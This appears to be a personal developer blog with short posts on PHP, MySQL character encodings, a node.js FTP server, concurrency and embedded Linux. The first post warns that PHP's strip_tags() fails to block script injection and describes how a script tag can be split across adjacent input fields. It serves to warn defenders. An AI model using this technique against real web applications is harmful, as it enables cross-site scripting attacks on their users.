28 3 / 2012
Tag stripping not sufficient to prevent JavaScript injections
In the PHP world, solely relying upon PHP’s strip_tags() function to protect your web application from JavaScript injections is a bad idea. If you do, you may be vulnerable in even the most recent browsers (I tested in Chrome 17.0.963.83, Firefox 9.0.1 and Internet Explorer 9). There may be parallels in other languages too, so beware.
You’ll be vulnerable if the following are true:
- You’ve got a webapp that accepts user input
- You use strip_tags() or similar to sanitize fields
- You don’t explicitly remove less-than or greater-than characters from those fields (PHP’s strip_tags won’t remove a partial “<script” tag)
- Values from two or more of these fields are printed close to each other in the output HTML, with little or no markup between them
The fourth item is tricky … The markup between the field values must not contain any quotes (the quotes would prematurely close the script tag injection attempt). In other words, it’s possible for an opening SCRIPT tag to be constructed using values from two subsequent user-input fields.
Granted, the vulnerability only arises if markup is formatted in a very specific way, but it’s worth taking another look at your code. See this gist with example HTML for what it looks like to your browser.
I submitted a Chromium bug report, but it’s something they’re not interested in fixing.
Guess we’re on our own.
27 3 / 2012
How to GitHub: Fork, Branch, Track, Squash and Pull Request
Oh thank god! Branching I understood, but was clueless when it came to pushing up a specific branch.
Rebasing too … reminds me of how we badly need a separate dev environment at work. Ugh.
In all, a wonderful tutorial that helps you play along with others while programming.
03 11 / 2011
Character encodings in practice
Building upon Joel’s post on Unicode, here are some real-world tips relating to character encodings.
Use them by name
Always explicitly specify which encoding you want (perhaps UTF-8). Don’t assume the language or library/tool you’re using will make the right decision for you. If you value your time, don’t ignore this recommendation, otherwise you’ll likely spend lots more time patching things up in the future.
A tale to drive this home
Until very recently, MySQL’s default charset was latin1. Our legacy code didn’t specify an encoding in PHP’s connection to MySQL, in our HTML, nor in our HTTP headers. And web browsers default to god knows what (“it depends”).
When the time came to export some table data to XML I ran into issues of invalid UTF-8 characters. I knew there were special characters in some text fields introduced by Microsoft Word copy-pasters, so I figured flipping the switch to UTF-8 would help. NOPE!
It appears that having failed to specify an encoding in the past caused special characters (fancy double-quotes, crosses, long dashes, etc) to be stored in MySQL in a fashion that doesn’t satisfy the UTF-8 format. Shit!
So I had to come up with a batch of find-and-replace regex patterns to turn those characters into proper UTF-8 or their HTML entities.
So please, do the following:
- Choose an encoding and stick to it
- Save your text files in that encoding
- Set the character encoding in your HTML
- Send the Content-type header with charset from your webserver
- Change the configuration defaults for MySQL or your DBMS
- Check and set the default for each of your databases (note I said database not DBMS)
- Check and specify the encoding for your tables and text fields
- Make sure you specify the encoding when you create or alter tables in the future
Don’t convert blindly
If you failed to do the above at one point in time, you may have content in your database that isn’t valid UTF-8 (assuming you want to convert to that to prevent further issues).
Users that copy and paste from Microsoft Word are likely the source of this problem, but don’t blame them or Word. Blame the programmer responsible!
Your task now is to convert those invalid UTF-8 byte strings into something more usable. You may be able to convert many to their HTML entities, but you probably want to convert alphabetical characters to their valid UTF-8 representation to ensure the text remains easily searchable.
Don’t convert blindlier
If you have to convert your table definitions and data to UTF-8 (from something like MySQL’s latin1), be careful. There’s a great post by the Wordpress crew of what it entails (multi-stage process, to intermediate binary column types first), but it didn’t cover this troublesome gotcha: If MySQL finds characters it can’t convert to UTF-8 it’ll truncate the rest of the field data
MySQL will gladly go through the motions with you as you convert from latin1 to UTF-8. It’ll issue warnings that something went wrong during the conversion. But it will still truncate your data at any character that’s not valid UTF-8. Instantly your article text will go from 10234 bytes to 145. There’s probably a valid technical reason why it doesn’t error out altogether, but all I know is I now have to re-populate tons of data from backups.
Permalink 33 notes
28 9 / 2011
node.js FTP server
Got to use node.js for a work project recently. We needed an FTP server with special user authentication that would run custom code after a file was uploaded. There was one node.js FTP server implementation on github, so I forked it and started rounding out the basic functionality. My fork is here.
The first significant change I made was to encapsulate the data connection logic. File lists and file contents are transferred over the data connection (FTP commands and responses over the control connection). I quickly found that some clients are super eager to send you data and will do so once a passive data connection is made, even before the FTP server tells them it’s ok to do so. This was especially problematic for file uploads over passive data connections. Without a workaround for these aggressive clients, the flow looked something like this:
- Receive PASV command from client
- Start listening on a port and tell client which port to connect to
- Receive STOR command from client, stating it’s going to upload a file
- Attach data listener to data connection that saves incoming data to file
- On data connection end event, make sure file data has been written
- Close the file
Due to the asynchronous nature of node.js, data often arrived between steps 3 and 4, before a data event listener had been attached. Some of the file chunks were falling through the cracks and the saved file was incomplete.
Also regarding the above flow, ensuring that all data had been written to disk before we attempted to close file was … well … convoluted. Maybe a solution could be found using fs.createWriteStream, but I’m still happier with what I’ll outline next.
Once I found out that data was falling through the cracks I did some searching and found that setting up a buffering data handler was a common solution to a common problem. Good to know! With a persistent data buffer in place things became much easier, like so:
- Receive PASV command from client
- Start listening on a port and tell client which port to connect to
- Once we get hint of a connection (socket connect event), listen for data events and push each data chunk onto a stack
- Receive STOR command from client, stating it’s going to upload a file
- On data connection end, open file
- Loop over buffered data
- Save each buffered chunk before moving to next chunk
- Close the file
It’s less than ideal to buffer each uploaded file in memory first, but it works and is simple. Success!
In addition to the above, I’ve encapsulated things further in my forked repo. The FTP server object itself emits some additional events which you can listen for. My goal was to encapsulate the basic FTP functionality and provide a way to take special actions when:
- A user connects
- A user attempts to log in (listen for these events and handle authentication yourself)
- User uploads a file
Hopefully someone with a slightly different use-case will come along and take things the rest of the way.
Permalink 18 notes
07 6 / 2011
concurrency learnings
There’s a job I’ve applied for that wants “strong concurrency coursework”, of which I’m lacking. Let’s start learning.
Visited stack overflow first for some example problems. Learned that “embarassingly parallel” problems are those where little or no effort is required to separate the problem into parallel tasks, like serving static files from a webserver. Good. Learning terminology is helpful. This led to mention of the R programming language’s snow package, which “implements a simple mechanism for using a collection of workstations or a Beowulf cluster for embarrassingly parallel computations”. Nice to know.
Googling more turned up some ACTUAL example problems.
Chose the first problem, and decide to investigate using posix semaphores. sem_open() and a named semaphore, to be specific. After failed attempts, the book says I need to start the name with a slash to make it shared. But that’s clearly not working. errno is helpful, but not that helpful. And remember, mode_t permissions are octal, not the const char from fopen. Do real C programmers always have the errno definitions handy?
The Tina process isn’t seeing any increase in the value of the judy semaphore (which I’m using as a crude “message-passing” mechanism … every time Judy snags a cookie, she posts on her semaphore). Of course, I’m using another semaphore as a boundary for the critical section.
So it looks like simple, cross-process named semaphores aren’t quite complete, but I may be wrong. Either way, now I’m thinking I should try cross-process shared memory for the semaphore pointer, and use sem_init().
My github repo is here.
Will resume at a later date. Bed time.
Permalink 13 notes
03 6 / 2011
BeagleBoard-xM
Going the common route for now. This will at least give me some hand-on cross-compilation experience for an architecture other than x86, and hopefully enough challenges to spark some deeper learning.
Oh how I love computers that don’t whirrrrr. Will be ordering shortly.
Permalink 7 notes
02 6 / 2011
Been powering through Embedded Linux Primer. A few high-level things I’ve learned:
- initrd is old, initramfs is new
- initramfs uses a CPIO image (a type of archive that was new to me) to hold the initial filesystem contents
- Using TFTP to boot from a remote kernel and ramdisk sounds like fun, not to mention provides great flexibility for debugging.
- It’s not so hard to add extra items to the kernel config menu
- Learned some ins and outs of Das U-boot, and that support for using RAM has to be initialized by the bootloader otherwise you can only use stack memory.
- JFFS2 can help increase the lifetime of flash memory
- The kernel boot process … through hardware-specific assembly files, common files, to the kernel C code, kernel subsystems, init.
Permalink 1 note
27 5 / 2011
PHP Sadness
This title links to a wonderful list of things that are stupid about PHP. I’ve used PHP almost every week since 2001.
Reminds me that I publicly gave up on PHP about 3 years ago. But what is wrong with me … why haven’t I moved on yet? It’s because I keep taking PHP jobs, which are too easy to find. The current one will be my last. My foot is down.
Permalink 1 note
25 5 / 2011
Reading a book on Embedded Linux
What follows are thoughts while reading Embedded Linux - Hardware, Software and Interfacing. Really enjoyed it.
It walks through planning for an automation system for a winter resort. Currently at chapter 6 and there’ve been a few things I’ve not done before.
Right away I discovered you could use gdb remotely with gdbremote. Great for remote debugging of cross-compiled applications.
I’ve done cross-compilation, albeit indirectly using buildroot, but I was still aware of what went on behind the scenes, aka: compiling gcc and glibc multiple times, the first being a way to bootstrap and create a more “pure” versions tailed specifically for the target platform.
Until now the book’s remaining quite high-level, so what I’m really excited about is a real-world walkthrough of writing serial communications code and linux drivers.
… later …
Just finished a portion on parallel port programming and then one for creating a simple kernel module. Had no idea that a simple module would be so simple. Very exciting.
… later …
The book covered a few ways to do parallel port programming: using port I/O and also ppdev (which allows you to use a /dev/parport0 type device file). So handy.
It then mentioned memory-mapped I/O, synchonous serial communication, and I2C. All things I’ve heard about, but have never seen in practice. There are so many device-specific implementation details that I mainly tried to gain a high-level view of the basics as I read: send 1 to this connector, wait for settling, send 0 to another connection, send the first bit of data, toggling a latch, next bit of data, etc etc.
Now I’m going to browse my Linux Kernel Development book and get a view of the other side of things … the kernel implementation details.
Permalink 9 notes
10 5 / 2011
And the outcome is: I need to work less and learn more.
My lack of knowledge about Information Theory, and the fact that I don’t have the proper framework for thinking about information theory has cost me … my data structure breaks down for anything more than 16-bit numbers. But that’s fine. I was in over my head from the start. Though, it was fun.